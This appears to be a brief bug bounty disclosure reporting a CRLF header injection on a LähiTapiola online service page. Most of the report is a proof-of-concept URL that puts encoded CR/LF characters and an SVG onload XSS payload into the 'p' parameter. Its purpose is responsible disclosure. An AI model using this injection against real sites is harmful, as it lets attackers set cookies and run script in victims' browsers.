CRLF injection in https://verkkopalvelu.lahitapiola.fi/

Hi there, There is an HTTP header injection on https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf it allow an attacker to set custom cookies and custom content (such as XSS attack) within the response. **PoC:** The parameter `p` is vulnerable. https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi&ltapp=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28document.domain%29%3E&selectedLanguage=fi&selectedArea= Screen: CRLF_poc.png